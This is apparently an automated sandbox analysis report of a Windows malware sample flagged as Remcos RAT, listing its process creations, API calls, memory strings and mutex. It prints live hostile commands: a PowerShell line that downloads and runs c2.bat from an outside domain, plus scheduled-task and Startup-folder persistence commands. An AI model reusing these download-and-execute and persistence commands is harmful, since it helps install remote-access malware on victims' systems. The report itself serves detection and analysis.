Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "[net.servicepointmanager]::securityprotocol=[net.securityprotocoltype]::tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:temp + '\c2.bat';invoke-webrequest -uri $u -outfile $o;start-process -filepath $o -nonewwindow"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "[net.servicepointmanager]::securityprotocol=[net.securityprotocoltype]::tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:temp + '\c2.bat';invoke-webrequest -uri $u -outfile $o;start-process -filepath $o -nonewwindow"	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E314AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

36_2_00E314AE

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E31FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

36_2_00E31FB0

Source: Propose.com, 0000001C.00000003.2062594895.00000000038CB000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000000.2055549872.0000000000AC3000.00000002.00000001.01000000.00000010.sdmp, LinkHub.com, 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: LinkHub.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00DF0A08 cpuid

36_2_00DF0A08

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E2E5F4 GetLocalTime,

36_2_00E2E5F4

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E2E652 GetUserNameW,

36_2_00E2E652

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E0BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

36_2_00E0BCD2

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 16_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

16_2_00406805

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: LinkHub.com	Binary or memory string: WIN_81
Source: LinkHub.com	Binary or memory string: WIN_XP
Source: Brian.24.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: LinkHub.com	Binary or memory string: WIN_XPe
Source: LinkHub.com	Binary or memory string: WIN_VISTA
Source: LinkHub.com	Binary or memory string: WIN_7
Source: LinkHub.com	Binary or memory string: WIN_8

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3QMI88

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E52263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	36_2_00E52263
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E51C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	36_2_00E51C61
